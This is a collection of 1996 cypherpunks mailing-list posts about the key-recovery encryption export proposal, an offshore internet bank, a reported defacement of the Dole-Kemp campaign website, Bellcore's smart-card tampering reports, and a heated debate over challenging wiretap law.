while maintaining interoperability and information exchange with other
users regardless of location. 

It is not clear, however, to what extent the administration's proposal
provides relief to U.S. software and hardware companies who must compete
with foreign suppliers. These foreign suppliers, not subject to U.S.
law, can provide strong, non-key-recovery encryption in their products. 

Today, most major computer and software solutions firms derive
significant revenues from outside the United States. The government's
proposal, while satisfying the U.S. government's needs, does little to
enhance the competitiveness of American products overseas. Robust
encryption products are already available from many overseas suppliers,
and U.S. market share in encryption-enabled products is under siege. 

Under this proposal, it appears that U.S. companies will still be
prohibited from selling non-key-recovery encryption solutions in
overseas markets, creating a significant barrier to their
competitiveness. 

RSA looks forward to additional announcements by the administration that
specifically address this issue and provide competitive relief for the
U.S. computer software and hardware industries. 

RSA Data Security Inc. 

RSA Data Security Inc., a wholly-owned subsidiary of Security Dynamics
Technologies Inc. (NASDAQ:SDTI), is the world's brand name for
cryptography, with more than 75 million copies of RSA encryption and
authentication technologies installed and in use worldwide. 

RSA technologies are part of existing and proposed standards for the
Internet and World Wide Web, ITU, ISO, ANSI, IEEE, and business,
financial and electronic commerce networks around the globe. The company
develops and markets platform-independent developer's kits and end-user
products and provides comprehensive cryptographic consulting services. 

Founded in 1982 by the inventors of the RSA Public Key Cryptosystem, the
company is headquartered in Redwood City. 

Note to Editors: RSA Emergency Access, RSA SecurPC, BSAFE and TIPEM are
trademarks of RSA Data Security Inc. All other product and brand names
are trademarks or registered trademarks of their respective companies. 

CONTACT: For RSA Data Security Inc. | Patrick Corman, 415/326-9648 |
corman@cerfnet.com 

[10-04-96 at 08:17 EDT, Business Wire] 

Contact: Business Wire 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 8 Oct 1996 14:06:47 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Put up or shut up!
In-Reply-To: <Pine.SUN.3.94.961007044754.17782O-100000@polaris>
Message-ID: <199610072156.QAA00362@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


Mr. Unicorn wrote:
> I suggest that you just walk into a bank in Luxembourg, Liechtenstein,
> perhaps in Switzerland and compare the experience to doing the same in the
> United States.  It may be a bother to get to a real bank, but the
> difference in service, attitude, and skill can be substantial.
> You get what you pay for in sweat too.

     Yeah, but the walk to the bank in Liechtenstein is a real bitch in 
winter. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Tue, 8 Oct 1996 12:12:01 +0800
To: trei@process.com
Subject: Re: Clipper spin [was Re:Flood Warning]
In-Reply-To: <199610071332.GAA08581@toad.com>
Message-ID: <rogerohie1lc5.fsf@trout.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Peter Trei <trei@process.com> writes:

  > Back when IBM/Lotus came out with it's "International" version, I
  > proposed the term 'espionage-enabled software'. I still like it.

But it doesn't have a catchy acronym like "Government Access to Keys".

"Espionage-Enabled Keys", maybe? ;-)

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Oct 1996 14:04:01 +0800
To: John Young <jya@pipeline.com>
Subject: EUB - Pay attention next time guys.
In-Reply-To: <1.5.4.16.19961007141311.38278e72@pop.pipeline.com>
Message-ID: <Pine.SUN.3.94.961007163406.9806B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, John Young wrote:

>    10-7-96. WaPo:
> 
>    "Russian Crime Finds Havens In Caribbean"
> 
>       Russian organized crime groups are using unregulated and
>       secretive Caribbean banks to launder their illicit
>       gains, according to U.S. and Caribbean law enforcement
>       officials. One bank that has drawn the scrutiny of U.S.
>       authorities is European Union Bank in Antigua. EUB
>       describes itself as the first bank on the Internet,
>       offering the chance to open accounts, wire money, order
>       credit cards or write checks by computer from anywhere
>       in the world, 24 hours a day. A U.S. official said, "The
>       bank is being investigated for violating U.S. laws with
>       open solicitations on the Net, which is at best for tax
>       evasion and at worst for money laundering."
> 

Of course I'm very interested to hear exactly what laws have been broken
in this case.  Last I checked offering accounts, credit cards, and checks
24 hours a day was a selling point, not a crime.  This hardly surprises me
however.  The money laundering and tax evasion rhetoric is dragged out
whenever there is no tangible crime being committed.

EUB is probably in more trouble than they realize because they chose an
interesting solution to their bandwidth problem. 

For a long time their home page resolved to a U.S. access provider, and
only forwarded offshore for the secure HTTP connection.  This might still
be the case.

See below:

European Union Bank (EUB-DOM)
   PO Box 1948
   St. John's,
   Antigua and Barbuda

   Domain Name: EUB.COM

   Administrative Contact:
      Richards, Pete  (PR374)  75057.2515@COMPUSERVE.COM
      (809) 480-2370
   Technical Contact, Zone Contact, Billing Contact:
      Kulkov, Val  (VK41)  val@GREATIS.COM
      (202) 835-7489

   Record last updated on 03-Dec-95.
   Record created on 23-Jun-95.

   Domain servers in listed order:

   ELF.GREATIS.COM              205.229.28.5
   WHALE.GREATIS.COM            205.229.28.10


I found this curious and called them up to ask them about it.  I think,
though I don't remember exactly, that I spoke with Mr. Richards.  Whoever
it was, they were very sure that their U.S. connection would not be a
problem.  I think they are about to be in for a great big surprise.  They
have effectively put themselves in U.S. jurisdiction and their local
access provider is likely to be in some trouble as it is the easiest thing
to reach.

Prediction: EUB will change its structure dramatically in the next 6
months if it still exists at all in that time.  Lesson learned: Never
involve the United States directly.  Clever political risk analysis would
have prevented a great deal of trouble for EUB.  Future institutions take
note.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Mon, 7 Oct 1996 17:12:06 +0800
To: campbell@c2.net
Subject: Re: Dole web site cracked?
In-Reply-To: <9610070342.AA24124@cfdevx1.lehman.com>
Message-ID: <199610070710.RAA24533@myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain


You, Rick Campbell, shaped the electrons to say:
+
+So, I just finished watching the debate and at the very end, Bob Dole
+suggested that people check out www.dole-kemp.org.  I was already on
+playing decision96.digital.com so I went for it.
+
+The first page says ``Oops!  You've tried to access the old
+way.  Please choose the new way instead.''  Clicking on `new' gives a
+black background page with two yellow arrows, one left and one right.
+The left one gives you ``Nope, you can't go back now''.  The Right one
+gives you www.cg96.org, the Clinton-Gore home page.


Yeah.... definatly hacked... not much point in mirroring this one.

hmm it goes to www.dole-kemp.com which then sends it to cg96.org......
hmmmm the INTERNIC entry for dole-kemp.com looks find... and its a redirect, 
so they prolly hacked both sites... not sure... anyone else have any
ideas?


 ----------------------------------------------------------------------
| Skeeve Stevens                       |  url: http://www.skeeve.net/  |
| MyInternet - CEO/All Round Nice Guy  |------------------------------- 
| email:  skeeve@skeeve.net            |  Australian Anglicans Online  |
| url:    http://www.myinternet.net/   |  http://www.anglican.asn.au/  |
| phone:  (+612) 9869-3334             |-------------------------------
| mobile: (0414) SKEEVE [753-383]      |     Witty comment here! ;-)   |
 ----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Oct 1996 13:38:01 +0800
To: cypherpunks@toad.com
Subject: Big Brother vs. Cypherpunks
Message-ID: <1.5.4.16.19961007211311.2c1faa7e@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Time, October 14, 1996, p. 78.


   The Netly News

   Joshua Quittner

   Big Brother vs. Cypherpunks


   For more than three years, the White House and the U.S.
   computer industry have sat locked, eyeball to eyeball, in
   a seemingly intractable face-off over who will control
   the secret codes that protect our most sensitive
   communications. The government claimed to be working to
   protect us from nuke-carrying terrorists; the computer
   industry said it was championing the individual's right
   to privacy. Neither was telling the whole truth.

   Last week, in a concession to Silicon Valley, the
   Administration blinked -- or perhaps it merely winked.
   Fittingly, in the arcane world of code making and
   breaking, it's difficult to ferret out who's doing what
   to whom. And why.

   A few things are incontrovertible. Vice President Al Gore
   announced the new encryption initiative at midweek, timed
   to coincide with support from an alliance of high-tech
   businesses that included such hardware heavyweights as
   IBM, Sun Microsystems and Hewlett-Packard. However, most
   of the big software makers --  and every civil liberties
   group -- still opposed it.

   At the core of the initiative is a new code-making scheme
   known as "key recovery." Here at last, the government and
   its supporters claimed, was a way to get around the more
   noxious aspects of the reviled Clipper chip, the
   Administration's first doomed attempt to balance the
   industry's call for stronger encryption with law
   enforcement's need to surveil our shadier citizens.
   Clipper, as proposed, would use a powerful encryption
   formula to encode communications sent over telephones and
   computer networks but would require that a "back door"
   key be built into each chip that would give police --
   where warranted, of course -- a means to eavesdrop.

   Nobody -- especially foreign companies -- liked the idea
   of the U.S. and its agents holding those keys. The new
   key-recovery proposal tries to get around that objection
   by chopping the keys into several pieces and storing them
   with "trusted agents" of the user's choosing. Some nice
   Swiss banks, perhaps.

   But the Administration's plan still falls short of what
   civil libertarians, and especially a vocal group of
   cryptoextremists who call themselves cypherpunks, say
   they need: encryption powerful enough to give back to the
   citizenry the right to absolute privacy, which we have
   lost in the information age. According to the
   cypherpunks, the so-called 56-bit code the Administration
   has okayed for export can be cracked by the National
   Security Agency's supercomputers in a matter of hours.

   Are they right? It's hard to know whom to believe in this
   cloak-and-dagger debate. Civil libertarians tend to gloss
   over the fact that the world is full of bad people with
   crimes to hide. The software industry -- which makes 48%
   of its profit overseas -- is clearly less concerned with
   privacy than with losing foreign sales. And it may be no
   accident that the Administration chose to start making
   concessions the same week an influential software CEO --
   Netscape's Jim Barksdale -- excoriated Clinton's
   cryptopolicy and endorsed Bob Dole.

   The issue is too complex -- and too important -- for
   political gamesmanship. It will never get sorted out
   until somebody starts playing it straight.

   -----

   Read the Netly News daily at netlynews.com on the World
   Wide Web

   [End]

   Thanks to JQ.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeffm@icu.com (Jeff Menzie)
Date: Tue, 8 Oct 1996 12:19:21 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19961007211523578.AAA132@CISPPP>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 8 Oct 1996 13:38:06 +0800
To: "I~nigo Gonzalez" <nexus@adv.es>
Subject: Re: Best-of-Crypto (was:this list is a joke)
In-Reply-To: <3258D4CA.2456@adv.es>
Message-ID: <v03007815ae7f601fb8ff@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM +0200 10/7/96, I~nigo Gonzalez wrote:

>Maybe we can build here (at adv.es) a Best-Of-Crypto mailing list...
>with the _same_ spirit we have now Best-Of-Security...
>I mean technical, relevant postings...
>
>Any comments ???

Go for it! Let us know when you have it ready.

(I assume you were not just idly insulting the list, as is so common these
days, and expecting that your "Best of" list would emerge.)

By the way, at least two such "best of" compilations exist, one by Eric
Blossom, and one by Ray Arachelian.

Something I've noticed about many of these "This list is not helpful to
me--I want it to discuss the stuff I'm interested in!" whinings and
moanings is that they often come from people who I've never heard of, or at
least who do not appear to ever get involved. Perhaps they're new to the
list, found it was not what they wanted, and thus they should simply
unsubscribe, not whine about it not being what they wanted.

Or perhaps they're longterm subscribers who just never have anything to
say, but who then add their "me toos" to KOTM Vulis' babblings.

In any case, the list is what people make of it. There is no magic wand, no
moderator, no editor to solicit interesting articles. The key lies in
people developing ideas and then writing about them.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 8 Oct 1996 11:10:27 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Can somebody unsubscribe cyberpromo from CP?
In-Reply-To: <v03007811ae7f163b5cc0@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.961007174055.1381A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Timothy C. May wrote:

> At 10:23 AM -0800 10/7/96, jim bell wrote:
> >I think somebody subscribed that Cyberpromo organization to the Cypherpunks
> >list.  It needs to be unsubscribed...
> 
> "I have a solution."
> 

[Looks through pockets] - 7 Zlotys, 1.5 DM, and 1.20 GBP says October 
21st, in the library, bludgeoning to death with 20lbs of junk mail

---
If I can get my key back,   it's Key Recovery
If you can get my key back, it's Key Escrow





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Tue, 8 Oct 1996 16:09:19 +0800
To: cypherpunks@toad.com
Subject: ABC Newz on Dole Homepage
Message-ID: <2.2.16.19961007224541.19d73416@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


ABC Newz has run the crack of the dolekemp page.
However, even they have the story wrong, too!

No wonder crypto stories are sometimes better off not reported.

CarolAnne
Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Oct 1996 13:12:34 +0800
To: cypherpunks@toad.com
Subject: challenging wiretap law
Message-ID: <199610080136.SAA15855@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



alright, let me try to rephrase this.  if you feel the urge
to flame me over a simple post, without actually posting
anything substantial, please avoid it.

I was trying to get at something in a previous post. I
regularly see cpunks here scheming about how to attack
things they don't like using court decisions. I think it's
a great way to try to move the law in a favorable direction 
I see Bernstein/Junger as really embodying cpunk guerilla-like
tactics in trying to take on the status quo govt using the
legal system. of course this is not cheap, but EFF is helping
out at least, and PRZ proves the public is generally willing to put
its money where its mouth is on these issues. there's also a lot
of scheming over patent laws going on among cylink, RSA data
securities, etc.

the point is that I don't recall seeing this same kind of scheming
against wiretap rules here; if it was here then forgive me, I missed
it. for anyone who would like to, I'd be
very interested in a brief discussion over wiretap laws
and which ones have gone to the supreme court in court 
challenges.  here's my curiosity: if you were a lawyer, or 
actually are one, how would you go about challenging the
legitimacy of wiretaps, in the same spirit in which ITAR
is being challenged? note that even if there are court
precedents at "lower" courts, this does not preclude strategizing
to try to take the cases to the supreme court.

I am not asking anyone to do my "homework" for me. I'm merely
proposing that this might be a neat exercise for the collective
cypherpunk brain. of course it won't get far if people rant about
it, but merely discussing existing case law would make a good
and interesting topic imho.  if there are people out there who
are familiar with it and would like to discuss it, and can stand
Unicorn ranting at you no matter what you say, please do-- 
it would be signal in the noise around here.

challenging these laws in the weak spots
could be a very devastating means of 
defying law enforcement claims that they only want to "preserve
the status quo" and want "no new authorities to wiretap". could
wiretapping be "nipped in the bud" somehow? there is tremendous
economic incentive for laywers to challenge things like patents
etc, but this same incentive doesn't seem to exist in challenging
wiretap rules. hence I wonder if they have been challenged to the
same extent that  other court decisions have been.

of course,
there are areas where wiretaps have been challenged and the challenges
failed. but that doesn't mean there aren't weak spots that might
exist somewhere that could "crack" it. it's like hacking, a bit, in
this way, hence why I think it would make a good topic for
discussion.

or would the lawyers assert there are no weak spots in the wiretap
laws? that the issue has been fleshed out as far as it will ever
be in courts? again, what I am trying to suggest is that if there
was a "new angle of attack" not used in any previous wiretap cases,
it's highly relevant. again, merely because certain cases approved
wiretapping does not necessarily mean all future decisions will
support it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Oct 1996 13:49:11 +0800
To: cypherpunks@toad.com
Subject: BEL_cor
Message-ID: <1.5.4.16.19961007224709.3b3f6e30@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've grabbed the Bellcore reports on EZ-tamper smart card crypto for those
who want to try it:

     http://jya.com/belcor.txt  (17 kb for 3)

     ftp://jya.com/pub/incoming/belcor.txt

     BEL_cor


Bellcore's Ken Branson says that the researchers are due to publish the work
in more detail in a distinguished journal -- for mucho Erdos numeros and The
Wild Bunch infosec cultists.


Why, Ken prys and spies, are los architectoes del jya.commie, curious about
such esoterica topicana? It's obvious, jyawns, guzzling tequila sombreroly,
the sweaty-palm topic's matt-blazing hot, like the Bellcore rocket miraging
del web page.


RH, eatcher heart out. TM, oh my, herding cats.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 8 Oct 1996 13:10:13 +0800
To: "Vladimir Z. Nuri" <gbroiles@netbox.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <199610080151.SAA06373@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:22 PM 10/7/96 -0700, Vladimir Z. Nuri wrote:

>>and an argument about the constitution:
>>
>>"The constitution says I must be given a choice between disclosing and
>>contempt." 
>>
>>I don't remember seeing any examples of the latter come across the list. As
>>I remember things, the context of my statement above was a discussion of
>>why third-party key escrow is not the same as self-escrow. 
>
>the point is that many cpunks feel that  warrants and wiretaps and
>subpoenas are things to defy. it's a hypocritical double standard
>in which they cloth themselves in the wrapping of the constitution
>or law whenever it is useful to their arguments, and then advocate 
criminality,
>such as via defying legal warrants etc, whenever the case suits them.

Grandly ignoring the 5th amendment, I see?!?  I don't see any contradiction: 
 We can look to the Constitution, simultaneously, for rights for ourselves 
AND for restrictions on government. 

>
>[wiretaps]
>
>>It's rarely quoted here because it is unremarkable; just as the list is not
>>a place for basic crypto education, it is not a place for basic legal
>>education. 
>
>ooops, you fell for Unicorn's muddying misstatement of my question. OBVIOUSLY
>there is lots of case law on wiretaps. what I was trying to point out
>was that I find little discussion of cases here trying to discredit
>wiretap law for various reasons, such as that the wiretapped
>person is not informed. the distinction of the person *not*being*informed*
>of the wiretap is very important as otehrs here agree, and I would
>expect everyone would be familiar with a simple case that gives a 
>decision on it (in much the way many constitutional cases are
>regularly quoted) or that people would advocate wiretap law would
>be challenged on the basis of the lack of such a precedent case.

Now _THAT'S_ a very valid point.  Unicorn totally ignored that issue.  I 
pointed out my expectation that the only reason wiretaps are secret is their 
technical ability to do them while staying secret.

I've occasionally pointed out that if tomorrow, scientists discover some 
sort of teleport system that allows cops to sneak through walls, at the same 
time being invisible, cops and judges will suddenly announce that the 
requirement that people searched need to be informed of that search is, uh, 
no longer applicable.

This is a problem.  No, not the precise hypothetical I imagined above; I 
don't think it's going to be possible as stated for a long time and probably 
never.  The problem, however, is that "the authorities" have respect for the 
rights of the citizens more in the breach than in the observance, and if 
they find what they consider to be a good reason to ignore them, they will 
with little hesitation.


>>(The answer to most of the "how do I find out about 'X'?" questions
>
>you have a lot of good advice, but I ask none of the things you are
>attributing to me. I simply would like to carry on a discussion with
>a civilized lawyer who specializes in the subject, rather than have
>a people tell me why I cannot even do this, and must become a law
>specialized before I can even use the word "wiretap" with any 
>meaningfulness.

It's particularly pointless that some of these lawyers keep saying things 
like, "You don't understand how the law works!" when it is quite obvious 
that in most cases, the people who are complaining DO know enough about how 
the law works to identify when it is being abused.  This is not surprising:  
For example, I can't ice-skate worth beans, but I easily tell the difference 
between a bad and a good ice-skater.  I can't make music, but I can tell the 
difference between bad and good music.  I don't know much about 
architecture, but if I see a building collapse I can see that somebody made 
a mistake.  I don't act, but I can tell the different between a good and bad 
actor.

It is a frequent conceit among "experts" that the only people who should be 
able to criticize them are people who know as much as they do on a 
particular subject.  Black Unicorn is particularly bad in this regard.


>the chief point of my post was to question why the EFF etc. are not
>at all interested in challenging the wiretap "status quo" in spite
>of what many people here believe/advocate-- that wiretapping was
>never legitimate in the first place. this is curious because EFF
>etc. *are* willing to back up the cryptography cases out there,
>ala Bernstein etc.

Probably mostly because they expect that the government is going to be 
completely unwilling to admit that it's wrong.  In fact, of course, that's 
exactly why the government is very much afraid of the advent of good encryption:  
Ubiquitous crypto telephones make the government's use of wiretapping 
irrelevant, totally without regard to what any cop or judge or prosecutor 
says.  Fundamentally, it's a technical fix to a legal mistake.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Oct 1996 15:50:59 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610080151.SAA06373@mail.pacifier.com>
Message-ID: <199610080213.TAA20749@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(uhm, for the record, despite whatever appearances,
I am not on Jim-Bell-assassin-boy's side in any debate.)

>>the point is that many cpunks feel that  warrants and wiretaps and
>>subpoenas are things to defy. it's a hypocritical double standard
>>in which they cloth themselves in the wrapping of the constitution
>>or law whenever it is useful to their arguments, and then advocate 
>criminality,
>>such as via defying legal warrants etc, whenever the case suits them.
>
>Grandly ignoring the 5th amendment, I see?!?  I don't see any contradiction: 
> We can look to the Constitution, simultaneously, for rights for ourselves 
>AND for restrictions on government. 

all lawyers will tell you that the 5th amendment does not preclude you
"handing over evidence" under a warrant. it's a tricky aspect of law. "handing 
over evidence" makes sense with physical things, but courts/government
are struggling to figure out what it means in the information age.

>It's particularly pointless that some of these lawyers keep saying things 
>like, "You don't understand how the law works!"

my objection to Broiles/Unicorn is that they could simply post a few
cases and a summary of what wiretap law is about, esp. with their
legal background rather than flaming
my testicles off for not doing this myself. I agree with you that
people who shout, "you cannot even be allowed to TALK about such things
unless you go to the library, research at least five days, etc"-- I'm
sure that someone else has done this already, and I'm merely giving
an open invitation to them to discuss what they found. that's the beauty
of cyberspace, when it works right, everyone pitches in. you learn
from people who know more than you do, and they learn when you know
more than they do. no one's the authority or monopoly. in 
dysfunctional places such as this little rats-nest-hell-hole, you
get egotistical people, who perceive you are invading their turf without
beforehand displaying a sufficiently large "qualification", 
shouting at the top of their lungs that we should not
even discuss such a matter until everyone's credentials in the matter
are settled apriori.  (****size wars!!)

>It is a frequent conceit among "experts" that the only people who should be 
>able to criticize them are people who know as much as they do on a 
>particular subject.  Black Unicorn is particularly bad in this regard.

ok assassin boy, I hate to admit it but you have a great point there.
and its a big problem on this list. frankly I believe it has much more
to do with dueling egos than anything else. and the egos always have
been enormously bloated around here. why, it's a great opportunity for
someone to prick the bubbles. one can create quite a stir very easily
in a frothing anarchists-nest, speaking from experience <g>

>Ubiquitous crypto telephones make the government's use of wiretapping 
>irrelevant, totally without regard to what any cop or judge or prosecutor 
>says.  Fundamentally, it's a technical fix to a legal mistake.

another good example of how  a cpunk extremist ignores law when it
is not in his favor. law will always say that you have to hand
over evidence relevant to a case when compelled by warrant. whether
you can evade such a thing is irrelevant from the legal standpoint. and
what's orwellian about that?

there are two positions:

1. whatever is possible technically goes. if something cannot be
enforced, it should not be illegal. this position is fundamentally
anti-law. whoever uses it cannot legitimately wrap themselves in
constitution protections, because the constitution is the epitome
of law. the govt-assassins would essentially hold this side.

2. people in an orderly society follow laws not because they are compelled
to, but because they recognize that order is maintained through
compliance, and chaos ensues from noncompliance. they change bad
laws using mechanisms built-in within the system to do so.


the point is, either the law of the land is legitimate or not. if it is not
legitimate, you are advocating anarchy and have no business 
talking about the constitition etc.  if the law is legitimate, you
follow it regardless of whether enforcement is possible, but may work
within the system to change it, e.g. court challenges such as those
I've been advocating.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 8 Oct 1996 13:50:20 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Londinium [RANT]
In-Reply-To: <3.0b19.32.19961007110200.00a064b8@panix.com>
Message-ID: <3259C210.3968@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> So a few days in Londinium for the Internet Show at the Aggie (now the
> Business Design Centre) in the People's Republic of Islington.
> While I was in town, Tony Blair's voicemail was hacked (it wasn't me)
> and we discovered that he is a politician trying to fool the voters.
> Also, a public domain game called "Schoolyard Slaughter" written for
> an obsolete computer system and awarding points for head shots to
> children was attacked in the press.  It was distributed on shareware
> disks and CDs and not on the dreaded Net but they talked about the net
> in any case.
> The interesting thing about "Schoolyard Slaughter" is that similar
> games involving adult males and aliens ("Doom" par example) have been
> around for a long time.  The lesser controversy surrounding games like
> Doom suggests that the commentators (and perhaps the public) are
> guilty of speciesism, ageism, and gender bias.  After all, the
> fictional slaughter of adult males and aliens should be just as bad as
> the fictional slaughter of children.

Really?  You mean *all* of us people could "come together" (like the 
media says so much) and give up all of our sacred cows at once?

I suggest to you that certain sacred cows will NEVER be given up, until 
there is no longer any "milk" in those particular cows.

[add'l text deleted]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Tue, 8 Oct 1996 14:09:21 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <3.0b28.32.19961007201030.0071b3b0@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


>no, all I am asking for is lawyers who are familiar with wiretap law
>to make a quick case against it based on a commonly-known precedent
>within their field. if you don't want to answer, don't post.

This sounds like a very reasonable proposal. But please don't take a lack
of response to your speculation as an endorsement of your idea, or a
suggestion that it's got even the teeniest shred of merit. I understood you
to be suggesting that because nobody's shown to your satisfaction that it's
meritless, you've somehow stumbled across something important. 

>I will write on anything I damn well please and research it poorly or
>thoroughly as I like, and whisper questions to any lawyers out there who care
>to talk about the subject to an interested layman.

This response illustrates precisely why Uni was reasonable in declining to
give you references. If you're not willing to look up your own crackpot
ideas, you certainly shouldn't imagine that someone else is. (But here's a
hint - if you read the statutes, you might discover that some notification
to the target of a wiretap is required, although not prior to installation.)

>you have a lot of good advice, but I ask none of the things you are
>attributing to me. I simply would like to carry on a discussion with
>a civilized lawyer who specializes in the subject, rather than have
>a people tell me why I cannot even do this, and must become a law
>specialized before I can even use the word "wiretap" with any 
>meaningfulness.

You can no more meaningfully discuss law without learning about it than you
can discuss cryptography or biology or philosophy or any other area of
human scholarship and knowledge.

I think it would be a positive change were the law reworked so that it was
more accessible to lay people, and so that the practice of law were not
such a specialized field. But please note that I talk about that as a
*change*, that is to say, different from how it is today.

You can, if you want, try to work on similar questions in parallel with
established institutions - probably all fields have a group of rogue
scholars or dissidents who believe nonstandard things, adopt nonstandard
methodologies, etc. Sometimes they turn out to be right, sometimes not.
This dynamic exists with law - e.g., what I'd call "Militia Law" (I think
they call it "Common Law" but I'm not sure). Jim Bell seems to be working
on a similar track - starting with original documents and deriving his own
interpretations, rules for statutory construction, and so forth. Perhaps
history will smile on Jim or the militia/common-law folks. Perhaps not.

But crossover is not possible (as should be clear from the past few days'
discussions). Arguments from one school of thought are not useful in the
other because the premises are different, and sometimes contradictory. I
think that it's interesting and good that people are working on their own
theories of law apart from the traditional institutional ones. But I think
it's sad when they try to use their theories (which I think are best
understood as the laws of a foreign, albeit imaginary, nation) in
contemporary state & federal courts. See 
<http://www-leland.stanford.edu/~jgadams/taxcases.html> for a big list of
cases where people with their own versions of the law got spanked in
traditional courtrooms. I think it's a shame when people excited about
their own legal theories get innocent third parties roped into these
peculiar scams. (Then again, there's the argument that this is evolution in
action.)

So that's a long way of saying "plonk." I don't think it's productive for
me to try to keep track of multiple versions of the constitution; and I've
settled on the one that's used today in court as the one I'm going to pay
attention to. I don't get the impression that you care about how things
actually work; you seem much more interested in making some baroque
rhetorical point about how all cypherpunks are evil. (In particular, I'm
suspicious that you think wiretaps are unconstitutional yet it's evil to
try to avoid them with crypto. I think you want someone to write you
several pages' worth of memorandum about how wiretaps are legal, so that
you can cleverly turn around and argue that defeating something which turns
out to be so clearly legal must, in fact, be wrong. And I think you take
that position simply to be contrary.)

If you are truly interested in the legal questions around notice to
subjects and Title III wiretaps, see LaFave & Israel, "Criminal Procedure"
(West). It's got quite a few pages of discussion about Title III. I'm not
going to summarize it here because my copy is old enough that I don't know
if the research behind it is still current, and I'm not in the mood to do
free research for people who will ignore my results. But I'm willing to bet
that you'll never look it up anyway. 

>the chief point of my post was to question why the EFF etc. are not
>at all interested in challenging the wiretap "status quo" in spite
>of what many people here believe/advocate-- that wiretapping was
>never legitimate in the first place. this is curious because EFF
>etc. *are* willing to back up the cryptography cases out there,
>ala Bernstein etc.

The EFF's failure to work on your little project seems like it might be
caused by:

1.	a conclusion that it's not a viable argument, and hence a waste of
time/effort
2.	a conclusion that the constitutionality of wiretaps isn't specialized
enough that they should concentrate on it, they can leave that argument to
well-funded defense attorneys for Mafia/drug clients, who deal with wiretap
evidence frequently
3.	lack of a good case to raise it with

